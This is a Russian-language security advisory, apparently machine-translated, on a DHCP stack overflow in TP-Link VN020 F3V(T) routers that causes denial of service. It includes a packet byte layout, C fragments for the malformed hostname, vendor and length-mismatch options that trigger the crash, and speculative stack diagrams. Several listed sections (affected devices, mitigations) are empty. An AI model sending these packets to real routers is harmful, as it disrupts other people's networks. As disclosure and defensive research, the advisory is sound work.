Критическая уязвимость была обнаружена в маршрутизаторах TP-Link VN020 F3V (T), использующих версию прошивки TT_V6.2.1021. Уязвимость позволяет удаленным злоумышленникам запустить переполнение буфера на основе стека через специально созданные пакеты DHCP, что приводит к отрицанию условий обслуживания (DOS).
Пострадавшие устройства:
Важное примечание: из -за запатентованного характера прошивки точные детали внутренней реализации неизвестны. Этот анализ основан на наблюдаемом поведении и тестировании черного ящика.
[Basic DHCP Header]
0x00: 01 ; BOOTREQUEST
0x01: 01 ; Hardware type (Ethernet)
0x02: 06 ; Hardware address length
0x03: 00 ; Hops
0x04-0x07: XID ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC ; Client hardware address
0x29-0x2C: 0000 ; Padding
// Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = ' ' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );
// Vendor option manipulation
unsigned char vendor_specific [] = {
0x00 , 0x14 , 0x22 , // TP-Link vendor prefix
0xFF , 0xFF , 0xFF // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );
// Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });
Хотя точная внутренняя реализация неизвестна, наблюдаемое поведение предполагает потенциальные проблемы повреждения памяти:
Нормальная обработка имени хоста DHCP
Stack Layout (Normal Case)
+------------------------+ Higher addresses
| Previous Frame |
+------------------------+
| Return Address (4) |
+------------------------+
| Saved EBP (4) |
+------------------------+
| |
| Hostname Buffer |
| (64 bytes) |
| |
+------------------------+ Lower addresses
| Other Variables |
+------------------------+
Что может произойти внутри маршрутизатора?
Stack Layout (Overflow Case)
+------------------------+ Higher addresses
| Previous Frame |
+------------------------+
| Overwritten Return |
+------------------------+
| Overwritten EBP | <- Unknown state corruption
+------------------------+
| Overflow Data | <- 127 bytes of 'A'
| ... |
+------------------------+ Lower addresses
| Other Variables | <- Potentially corrupted
+------------------------+
Это теоретическое, и некоторые детали могут быть не совсем точными, поскольку TP-Link предоставляет прошивку для этого маршрутизатора исключительно для интернет-провайдеров.
Маршрутизатор может также попытаться перезапустить себя, как показано здесь из -за сбоя, как показано здесь:
В настоящее время официальный патч не доступен. Временные смягчения включают:
Мохамед Мааталлах